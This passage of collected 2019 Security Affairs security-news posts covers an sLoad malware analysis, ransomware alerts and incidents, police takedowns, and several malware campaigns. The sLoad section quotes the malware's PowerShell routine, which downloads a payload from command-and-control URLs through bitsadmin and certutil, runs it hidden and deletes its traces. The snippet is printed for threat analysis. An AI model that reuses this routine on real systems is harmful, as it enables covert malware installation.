Figure 7: Files created in “%AppData%\Roaming\<active_process>\”
  • <random_name>.tmp
  • <random_name>.ps1
  • config.ini
  • web.ini

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of “<random_name>.ps1” file is the following. The latest script decrypt the content of “config.ini” file. The following figure shown both encrypted and decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operation described in “main.ini” file but use different URLs stored in the “web.ini” file. Also this time, the file is decrypted using an integer array from 1 to 16  as key and contained in “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis, all the C2 URLs seems to be down, so we are not able to detect the final payload family. 

  1. $dPath = [Environment]::GetFolderPath(“MyDocuments”)
  2. $jerry=$starsLord+’\’+$roccon+’_’+$rp;
  3. $clpsr=’/C bitsadmin /transfer ‘+$rp+’ /download /priority FOREGROUND ‘+$line+’ ‘+$jerry+’.txt & Copy /Z ‘+$jerry+’.txt ‘+$jerry+’_1.txt & certutil -decode ‘+$jerry+’_1.txt ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & powershell -command “start-process ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe” & exit’;
  4. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
  5. $clpsr=’/C del ‘+$jerry+’.txt & del ‘+$jerry+’_1.txt & del ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & exit’;
  6. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of sLoad infection chain, we compared attack attempts observed since 2018 and the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with zip archive containing two files. In the first case the starting point is a “.lnk” file and in the second one the chain starts with a “.vbs” script. 

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably, this technique become more detectable during the time, so it could have been deprecated in latest infections attempts. For both malware variants, the archive contains a legit image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins. However, the latest stages uses a mix of Powershell and Visual Basic Scripts.

Figure 10: Infection chain workflow

The agent body is still quite similar in the core structure, however the bot now supports new commands such as “Exec” and “Eval”, the latter is able to download further code through the Bitsadmin utility instead of directly rely on “Net.WebClient” primitive. Also, the “ScreenCapture” function have been removed from the new version of the code, in favor to the enhancement of the agent persistence through scheduled task.

Figure 11: Comparison between old and new version on “config.ini” file


sLoad is keeping evolving their TTPs and represents a vivid threat for the Italian cyber-panorama. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by  Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL encrypted channels, makes detection of this threat difficult for automated systems, and frequently requires analysis abilities or high quality threat intelligence sources to detect and tackle sLoad attack campaigns, many times targeting just a single country.

Experts published a post on the Yoroi blog:

Pierluigi Paganini

(SecurityAffairs – sLoad, malware)

The post The sLoad Threat: Ten Months Later appeared first on Security Affairs.

FBI warns about high-impact Ransomware attacks on U.S. Organizations

The U.S. Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) warns organizations about high-impact ransomware attacks.

In a wake of the recent string of attacks against cities, school districts and hospitals, the U.S. Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) issued organizations about high-impact ransomware attacks.

“Ransomware attacks are becoming more targeted, sophisticated, and costly, even as the overall frequency of attacks remains consistent.” reads the public service announcement published by the IC3.

“Since early 2018, the incidence of broad, indiscriminant ransomware campaigns has sharply declined, but the losses from ransomware attacks have increased significantly, according to complaints received by IC3 and FBI case information. Although state and local governments have been particularly visible targets for ransomware attacks, ransomware actors have also targeted health care organizations, industrial companies, and the transportation sector.”

The FBI has observed cyber organizations using multiple techniques to deliver ransomware, including phishing campaigns and the exploitation of Remote Desktop Protocol (RDP) and software vulnerabilities.

The authorities discourage victims from paying a ransom because there is no guarantee that files will be decrypted. Sometimes crooks don’t decrypt them after the payment, in other cases security issues in the encryption process, or in the malware development, make it impossible to decrypt the data.

FBI urges victims to report the incident to the local FBI field office and to to receive the necessary support.

“Regardless of whether you or your organization have decided to pay the ransom, the FBI urges you to report ransomware incidents to law enforcement.” continues the announcement. “Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under U.S. law, and prevent future attacks.”

Reporting the ransomware attacks to the FBI will help law enforcement to track the crooks behind the campaign and to collect the indicators of compromise associated with the threat.

Below the cyber defense best practices shared by the FBI:

• Regularly back up data and verify its integrity
• Focus on awareness and training
• Patch the operating system, software, and firmware on devices
• Enable anti-malware auto-update and perform regular scans
• Implement the least privilege for file, directory, and network share permissions
• Disable macro scripts from Office files transmitted via email
• Implement software restriction policies and controls
• Employ best practices for use of RDP
• Implement application whitelisting
• Implement physical and logical separation of networks and data for different org units
• Require user interaction for end-user apps communicating with uncategorized online assets

Pierluigi Paganini

(SecurityAffairs – FBI, ransomware)

The post FBI warns about high-impact Ransomware attacks on U.S. Organizations appeared first on Security Affairs.

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

The Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

Cybercrime is a prolific business, criminal organizations continues to make profits with illegal activities in the cyberspace, but police are ready to contrast them. Cyber experts at the Ukrainian police dismantled a bot farm involved in spam campaigns carried out through various services, including email and social networks.

“Cyber ​​police officers, together with investigators of the Main Investigative Directorate of the National Police of Ukraine, under the procedural guidance of the Prosecutor General’s Office of Ukraine, exposed a large-scale service for mass distribution of electronic messages.” states the press release published by the Ukrainian police. “It is established that all works of the service are carried out exclusively at the request of interested clients. With this resource, it was possible to buy activated accounts in large numbers to various mail resources, social networks, payment systems and more. At the same time, verified accounts were also sold, the cost of which was much higher.”

Operators behind the bot farm were offering large numbers of active accounts for multiple online services that their customers used to carry out spam campaigns.

The Ukrainian Police raided houses, apartments, garages and rented offices in six Ukrainian cities (Kiev, Odesa, Lviv, Nikolaev, Rivne, and Kherson) and seized equipment used in the bot farm, including multi-SIM card modems and electronic equipment used to signup to payment systems.

Crooks were using the SIM cars to register accounts on various services that require a phone number for the verification of users’ identity. Crooks were preserving their anonymity using VPN and TOR services.

Police officers and the Main Investigative Directorate of Ukraine’s National Police carried out searches at houses, apartments, garages and rented offices where the group set up the illegal activity.

To anonymize the bot farm traffic, the operators ran connections through VPN services and the Tor network. Details of how the officers were able to discover the physical addresses remain undisclosed.

Authorities will analyze the seized equipment in an attempt to collect additional information on the crime rings.

“The pre-trial investigation is ongoing within the framework of the previously initiated criminal proceedings under Art. 1889 (Requirement), Art. 258 (Terrorist Act), Art. Measures are being taken to prosecute those involved in the organization of such activities. ” concludes the statement.

Today I had the pleasure to write a post on another successful operation conducted by law enforcement. A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed to track down and seize five servers that were composing a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam, it was used by tens of IoT botnets involved in DDoS attacks worldwide. 

Pierluigi Paganini

(SecurityAffairs – bot farm, cybercrime)

The post Ukrainian police dismantled a bot farm involved in multiple spam campaigns appeared first on Security Affairs.

Dutch police shut down bulletproof service hosting tens of DDoS botnets

Dutch police seized a bulletproof hosting service in a major takedown, the infrastructure was used by tens of IoT botnets involved in DDoS attacks.

A joint operation conducted by the Netherlands’ National Criminal Investigation Department and National Cyber Security Center allowed to track down and seize five servers that were composing a cybercrime underground bulletproof hosting service.

The servers were hosted at an unnamed data center in Amsterdam, it was used by tens of IoT botnets involved in DDoS attacks worldwide. The bulletproof hosting service was used to host malware and command and control systems of several DDoS botnets.

“Middelburg, Veendam, Amsterdam, Driebergen – The police has taken five servers offline that were used to control a version of a so-called botnet.” reads the press release published by the Dutch police. “The hardware was seized and the business operations stopped. A 24-year-old man from Veendam and a 28-year-old man from Middelburg were arrested on Tuesday evening. They are suspected of, among other things, computer breach and the spread of malware.”

Authorities revealed that they have received more than three thousand reports of malware spread through the bulletproof hosting service.over a period of one year.

The authorities also arrested two Dutch nationals who had been running a Mirai botnet from the servers of KV Solutions BV (KV hereinafter) bulletproof hosting service.

In this case, the police say, the people controlling those servers were a pair of Dutch nationals who had been running a Mirai botnet with cover from the bulletproof host.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device,” the translated police statement reads.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device. Which DDoS attacks can be attributed to this botnet is part of the further investigation.” continues the statement.

Authorities are analyzing the seized servers and the data they contain will likely lead to the arrests of other players in the cybercrime underground.

Pierluigi Paganini

(SecurityAffairs – bulletproof hosting service, malware)

The post Dutch police shut down bulletproof service hosting tens of DDoS botnets appeared first on Security Affairs.

Former American Express employee under investigation for customers’ data abuse

Authorities are investigating an American Express employee for unauthorized access to cardholder information and potentially abuse for fraud.

Authorities launched a criminal investigation on an American Express employee that is suspected to accessed to cardholder information and potentially abused for fraud.

Exposed information includes full name, physical and/or billing address, Social Security numbers, birth dates, and the credit card number.

The suspect is no longer working for the financial organization.

On September 30th, 2019, the financial institution began sending out data breach notifications to the impacted, the notice informed them that the former employee potentially used the data for fraudulent activities, including identity theft and financial frauds.

“It was brought to our attention that personal information, related to your American Express Card account listed above, may have been wrongfully accessed by one of our employees in an attempt to conduct fraudulent activity, including potentially opening accounts at other financial institutions.” reads the data breach notification. “In response, we immediately launched an investigation and are fully cooperating with law enforcement agencies to further their investigation.

American Express is offering free credit monitoring services through Experian Identity Works to impacted customers.

The company is also recommending impacted cardholders to monitor their credit report and statements for any fraudulent activity and report any suspicious activity to their bank.

Pierluigi Paganini

(SecurityAffairs – American Express, cybercrime)

The post Former American Express employee under investigation for customers’ data abuse appeared first on Security Affairs.

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory,

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)

The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

A new Adwind variant involved in attacks on US petroleum industry

Adwind is back, a new variant of the popular RAT is targeting US petroleum industry entities with new advanced features.

A new variant of the popular Adwind RAT (aka jRATAlienSpy, and JSocket) is targeting entities in the US petroleum industry. The new variant implements advanced features such as multi-layer obfuscation. The malware is distributed via a malspam campaign, the spam messages come with malicious attachments or include URL to malicious content.

“A new campaign spreading the Adwind RAT has been seen in the wild, specifically targeting the petroleum industry in the US. The samples are relatively new and implement multi-layer obfuscation to try to evade detection.” reads the analysis published by NetSkope. “We found multiple RAT samples hosted on the serving domain and spread across multiple directories, all hosted within the last month.”

Adwind is a cross-platform Remote Access Trojan written in Java, it was observed in attacks against aerospace enterprises in Switzerland, Austria, Ukraine, and the US. The Adwind RAT was first discovered early 2012, the experts dubbed it Frutas RAT and later it was identified with other names, Unrecom RAT (February 2014), AlienSpy (October 2014), and recently JSocket RAT (June 2015).

Adwind is could infect all the major operating systems, including Windows, Mac, Linux, and Android, it is available in the cybercrime underground as a malware-as-a-service (MaaS) model.

Once the Adwind RAT has infected a computer it can recruit it into a botnet for several illegal purposes (i.e. DDoS attacks, brute-forcing attacks).

Experts pointed out that the functionality of the RAT has remained the same as previous variants, the major change is in the obfuscation technique it implements. The malware uses delivers RAT payloads via nested JAR archives. The Netskope Threat Protection detects the malware as ByteCode-JAVA.Trojan.Kryptik and Gen:Variant.Application.Agentus.1.

“When the victim executes the payload, there are multiple levels of JAR extractions that occur.” continues the analysis

Netskope researchers discovered 20 malware samples hosted using compromised user accounts of the Australian ISP Westnet.

“The Adwind RAT is a well-known malware family that has actively been used in multiple campaigns over the last couple of years. The samples we analyzed showed that the VirusTotal detection ratio for the top-level JAR was 5/56 while that of the final decrypted JAR was 49/58.” conclude the expert. “These detection ratios indicate that attackers have largely been successful in developing new, innovative obfuscation techniques to evade detection.”

Netyskope’s report includes Indicators of compromise (IOCs), malware sample hashes for various JAR payloads used in these attacks, and IP addresses and domains of C&C infrastructure.

Pierluigi Paganini

(SecurityAffairs – Adwind, malware)

The post A new Adwind variant involved in attacks on US petroleum industry appeared first on Security Affairs.

Danish company Demant expects to incur losses of up to $95 after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused important problems to its operations, the company has yet to recover after the attack, a circumstance that suggests it was hit by a ransomware attack.

Demant expects to incur losses of up to $95 million following the incident, which includes a deduction of $14.6 million of expected insurance coverage.

We are therefore talking about figures that come into the list of the most important losses caused by cyber attacks.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransom incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported ComputerWord.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across Demant network have not been able to regularly provide to their service to end-users.

The impact is predominately related to the estimated lost sales and on the growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident is important because demonstrates the potential impact of a cyber attack on organizations and urges them to adopt necessary countermeasures.

The massive NotPetya ransomware attack caused billions of dollars to organizations worldwide, the shipping giant Maersk and courier service FedEx incurred in over $300 million each. In April, the Aluminum producer Norsk Hydro estimated the cost of the massive attack cyber attack targeting the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 after cyber attack appeared first on Security Affairs.

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

A recently observed a malvertising campaign carried out by a threat group dubbed eGobbler that hijacked roughly 1.16 billion ad impressions.

Researchers at Confiant observed a malvertising campaign carried out by a threat actor dubbed eGobbler hijacked roughly 1.16 billion ad impressions to redirect victims to websites hosting malicious payloads.

The campaign was observed between August 1 and September 23.

The eGobbler group was first observed by security firm Confiant in April when it was exploiting a security flaw in the Google Chrome browser to target millions of iOS users. At the time, Cofiant experts estimated that more than 500 million malicious ads had been served to iOS users.

This time eGobbler hackers extended their attacks to Windows, Linux, and macOS desktop devices.

“Over the past 6 months, the threat group has leveraged obscure browser bugs in order to engineer bypasses for built-in browser mitigations against pop-ups and forced redirections.” reads the analysis published by Confiant.

“This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. The second, which we reported on Aug. 7 was fixed in iOS 13 / Safari 13.0.1 on Sept. 19, impacts WebKit based browsers.”

In recent campaign, attackers used an exploit that targets WebKit based browsers, the researchers observed redirections on WebKit browsers upon the ‘onkeydown’ event.”

“The nature of the bug is that a cross-origin nested iframe is able to “autofocus” which bypasses the “allow-top-navigation-by-user-activation” sandbox directive on the parent frame.” continues the analysis. “With the inner frame automatically focused, the keydown event becomes a user activated navigation event, which renders the ad sandboxing entirely useless as a measure for forced redirect mitigation.”

Experts also discovered that the payload used in this campaign had specifically targeted some web applications using text areas and search forms in order to maximize the chances of hijacking these keypresses.

“eGobbler’s preference for desktop platforms during this period supports their latest WebKit exploit, as the ‘onkeydown’ event is less likely to spawn organically during mobile browsing,” states Confiant.

Experts reported the bug to both the Chrome and Apple security teams, the latter answered within the hour while on August 9 the former responded that they were investigating.

On August 12, the Chrome team provided an update that a patch was submitted to WebKit on August 9:

Apple addressed the issue in iOS 13 on September 19 and in Safari 13.0.1 on September 24.

The analysis published by the experts includes Indicators of Compromise for the recent campaign, including a list of content delivery network (CDNs) used by eGobbler threat actor to delivery the malicious payloads.

Pierluigi Paganini

(SecurityAffairs – eGobbler, hacking)

The post eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions appeared first on Security Affairs.

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

Experts recently analyzed an information-stealing malware tracked as Arcane Stealer V that is very cheap and easy to buy in the Dark Web.

In July 2019, researchers at Fidelis Threat Research Team (TRT) analyzed a sample of Arcane Stealer V, a .net information-stealing malware that is easy to acquire in the dark web. The author of the malware is selling it on his own website and on the Lolzteam site on the Dark Web, the researchers also found cracked versions on multiple community discussion and file-sharing platforms.

The malware is quite cheap, it goes for just $9 on the Dark Web, and could be also used by lower-skilled adversaries. Due to the low-cost of the malware, experts believe that its popularity could rapidly increase.

“The Arcane Stealer is a .net information stealer. The malware is available as a graphical user interface (GUI) or users can purchase the code, making it easier for actors with novice skills to employ. It sells for 699 Rubles or approximately 9 US dollars.” reads the post published by the researchers. “There is also support available on Telegram along with other “helpful” bots.”

In early August, the researchers were able to track multiple instant messenger and social media accounts associated with a Russian-language actor that might be the author of the malware.

The malware is able to collect various data from victims, including operating system, browser information, cryptocurrency wallets and instant-messaging sessions from Telegram, Discord, and Pidgin, data (i.e. passwords, cookies and forms) from a several of browsers, including Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex.

Arcane Stealer V could be used to steal documents, collect Steam gaming community data, logs detected virtual machine IPs, and data from FileZilla servers.

The threat actor behind the Arcane Stealer V also provides dashboards and statistics to show crooks that buy the malware the potential earnings.

Arcane Stealer V

When the malware runs, it takes a screenshot and then it creates a text log file of what was collected.

“When ran, the file collects data, takes a screenshot and then it creates a text log file of what was collected. It stores all of the information in a folder in %appdata%/local/{hwid}/.” continues the post. ” It uses the assigned hardware ID that the malware generates as the folder name and zip folder name.”

Then the malware sends the zipped file to the C2 server.

The researchers identified multiple Telegram and Twitter accounts with the handles “@arcanee_bot,” “@es3n1n” and “@SakariHack,” that were used to discuss how to build and distribute the malware. These accounts were all associated with the same Russian-language actor, a 21-year-old man that says to suffer a form of epilepsy.

“The actor associated with the malware appears to be a native Russian speaker, however it is unclear if the actor is currently located in Russia,” continues the analysis. “The actor’s information-stealer does not appear to limit potential targets. Analysts have observed the capability of Russian sites to be targeted in the malware.”

Experts pointed out that the malware unlike other threats doesn’t discriminate geo-location of the victims and could be used against any target.

“Based off current observation and analysis, Arcane Stealer and its developer(s) appear to be low-level threats.” conclude the experts.

“Due to the lack of traversal, propagation, or destructive capabilities at the time of analysis, it is assessed with moderate confidence that this malware may not become popular with high-value and highly capable actors. However, because users can buy the source code, it is possible that we may see other threat actors reusing the malware and creating their own variant of Arcane V, as has been done with other popular malware families, like njRAT.”

Pierluigi Paganini

(SecurityAffairs – Arcane Stealer V, malware)

The post Arcane Stealer V, a threat for lower-skilled adversaries that scares experts appeared first on Security Affairs.

Phishers continue to abuse Adobe and Google Open Redirects

Adobe and Google Open Redirects Abused by Phishing Campaigns

Experts reported that phishing campaigns are leveraging Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Phishers are abusing Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Crooks abuse Google and Adobe services to create URLs that point to malicious websites that anyway are able to bypass security filters because they appear as legitimate URLs from trusted IT giants.

“Open redirectors take you from a Google URL to another website chosen by whoever constructed the link. Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place. reads the post published by Google.

“Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored offers fairly clear benefits and poses very little practical risk.”

An example of Google open redirect is[url] that could be abused by attackers.

“Phishing campaigns commonly utilize open redirects from well known companies as they feel users will be more likely to click on a link if it belongs to Google or Adobe.” reported BleepingComputer.

Below an example of a phishing message that uses Google open redirect that points to a fake login page.

In a similar way, attackers could abuse the Adobe redirect service in phishing campaigns.

Experts suggest administrators and users remain vigilant on open redirects.

Pierluigi Paganini

(SecurityAffairs – google open redirects, phishing)

The post Phishers continue to abuse Adobe and Google Open Redirects appeared first on Security Affairs.

Security Affairs newsletter Round 233

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

0patch will provide micropatches for Windows 7 and Server 2008 after EoS
Critical flaws affect Jira Service Desk and Jira Service Desk Data Center
Facebook suspends tens of thousands of apps from hundreds of developers
Campbell County Memorial Hospital in Wyoming hit by ransomware attack
Portugues hacker faces hundreds of Charges in Football Leaks case
Portuguese hacker faces hundreds of Charges in Football Leaks case
Privilege Escalation flaw found in Forcepoint VPN Client for Windows
Thinkful forces a password reset for all users after a data breach
TortoiseShell Group targets IT Providers in supply chain attacks
A new Fancy Bear backdoor used to target political targets
APT or not APT? Whats Behind the Aggah Campaign
Hacker discloses details and PoC exploit code for unpatched 0Day in vBulletin
Microsoft released an out-of-band patch to fix Zero-day flaw exploited in the wild
North Korea-linked malware ATMDtrack infected ATMs in India
Adobe Patches two critical vulnerabilities in ColdFusion
Czech Intelligence ‘s report attributes major cyber attack to China
Heyyo dating app left its users data exposed online
US Utilities Targeted with LookBack RAT in a new phishing campaign
Airbus suppliers were hit by four major attack in the last 12 months
Botnet exploits recent vBulletin flaw to protect its bots
Emsisoft releases a free decryptor for the WannaCryFake ransomware
Study shows connections between 2000 malware samples used by Russian APT groups
USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.
Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips
DoorDash Data Breach exposes data of approximately 5 million users
Emsisoft released a new free decryption tool for the Avest ransomware
Magecart 5 hacker group targets L7 Routers
After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk
German police arrest suspects in raid network hosting Darknet marketplaces
Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada
Nodersok malware delivery campaign relies on advanced techniques

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 233 appeared first on Security Affairs.

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

Researchers at Proofpoint have spotted a piece of downloader, dubbed WhiteShadow, that leverages Microsoft SQL queries to pull and deliver malicious payloads. 

In August, malware researchers at Proofpoint spotted a new downloader which is being used to deliver a variety of malware via Microsoft SQL queries. The experts detected new Microsoft Office macros, which collectively act as a staged downloader, and tracked it as WhiteShadow.

Initially the downloader was involved in a small campaign aimed at distributing the Crimson RAT, over the time researchers observed the implementation of detection evasion techniques.

“In August 2019, the macros that make up WhiteShadow appeared in English-language cleartext. The only observed obfuscation technique was in the simple case altering of strings such as “Full_fILE” or “rUN_pATH.” In early September, we observed slight misspellings of certain variables such as “ShellAppzz.Namespace(Unzz).” Mid-September brought another change in macro code using reversed strings such as “StrReverse(“piz.Updates\stnemucoD\”)”.” reads the analysis published by Proofpoint.

“The most recently observed versions of the WhiteShadow macros contain long randomized text strings such as “skjfhskfhksfhksfhksjfh1223sfsdf.eDrAerTerAererer”.”

Experts believe that WhiteShadow is one component of a malware delivery service that includes a rented instance of Microsoft SQL Server to host various payloads retrieved by the downloader. Experts observed the downloader in campaigns spreading Crimson RAT, Agent Tesla, AZORult, and multiple keyloggers.

The macros observed in the campaigns, once enables, execute SQL queries to retrieve the malicious code, stored as ASCII-encoded strings, from Microsoft SQL Server databases controlled by threat actors. 

The result of the query is written to disk as a PKZip archive of a Windows executable. 

WhiteShadow uses a SQLOLEDB connector to connect to a remote Microsoft SQL Server instance, execute a query, and save the results to a file in the form of a zipped executable. The SQLOLEDB connector is an installable database connector from Microsoft but is included by default in many (if not all) installations of Microsoft Office.” continues the report.

“Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.”


Proofpoint warns that the Microsoft SQL technique is still a rarity in the threat landscape, but threat actors could increasingly adopt it in future campaigns. 

Pierluigi Paganini

(SecurityAffairs – WhiteShadow, malware)

The post WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware appeared first on Security Affairs.

Nodersok malware delivery campaign relies on advanced techniques

Microsoft researchers observed a campaign delivering malware, dubbed Nodersok, relying on advanced techniques and elusive network infrastructure.

Microsoft experts observed a malware campaign, tracked as Nodersok, relying on advanced techniques and elusive network infrastructure. Microsoft uncovered the campaign in mid-July when noticed patterns in the anomalous usage of MSHTA.exe.

Nodersok abuse of legitimate tools also called living-off-the-land binaries (LOLBins). Researchers observed threat actors dropping two legitimate tools onto the infected machines, namely Node.exe, the Windows implementation of the popular Node.js framework, and WinDivert, a network packet capture and manipulation utility.

“It’s not uncommon for attackers to download legitimate third-party tools onto infected machines (for example, PsExec is often abused to run other tools or commands).” reads the analysis published by Microsoft. “However, Nodersok went through a long chain of fileless techniques to install a pair of very peculiar tools with one final objective: turn infected machines into zombie proxies.”

The Nodersok campaign has already infected thousands of machines in the last several weeks. Most of the victims are located in the United States and Europe, they are predominantly consumers. About 3% of the infected systems belong to organizations in different sectors, including education, professional services, healthcare, finance, and retail.

Nodersok campaign

The attack chain starts when the users run an HTML Application (HTA) that is delivered likely through compromised advertisements. The JavaScript code in the HTA file downloads a second state component that launches a Powershell.

The Powershell command downloads additional components. One of the second-stage instances of PowerShell downloads the legitimate node.exe tool, while another drops WinDivert packet capture library components.

Another PowerShell component runs a shellcode to use WinDivert for the filtering and modification of certain outgoing packets.

The final payload turns the infected machine into a proxy.

The attackers leverage lksktWinDivert tool is used to intercept packets sent out to initiate a TCP connection and modify them in a manner that likely benefits the attackers.

“Both the distributed network infrastructure and the advanced fileless techniques allowed this campaign fly under the radar for a while, highlighting how having the right defensive technologies is of utmost importance in order to detect and counter these attacks in a timely manner.” Microsoft concludes.

“If we exclude all the clean and legitimate files leveraged by the attack, all that remains are the initial HTA file, the final Node.js-based payload, and a bunch of encrypted files. Traditional file-based signatures are inadequate to counter sophisticated threats like this.”

Pierluigi Paganini

(SecurityAffairs – Nodersok, hacking)

The post Nodersok malware delivery campaign relies on advanced techniques appeared first on Security Affairs.

German police arrest suspects in raid network hosting Darknet marketplaces

German police have shut down a network hosting Darknet marketplaces focused on the trading of drugs, stolen data and child pornography.

German police announced to have shut down a network hosting Darknet black marketplaces trading drugs, stolen data, and child pornography.

The black marketplaces were also offering stolen data and fake documents, and other illegal goods.

Authorities conducted an investigation on the operators of the “Bulletproof Hoster” service that was provided through servers hidden in a former NATO bunker, the so-called “Cyber Bunker.”

Law enforcement arrested seven suspects were arrested in a series of raids, four Dutch citizens, two Germans and one Bulgarian.

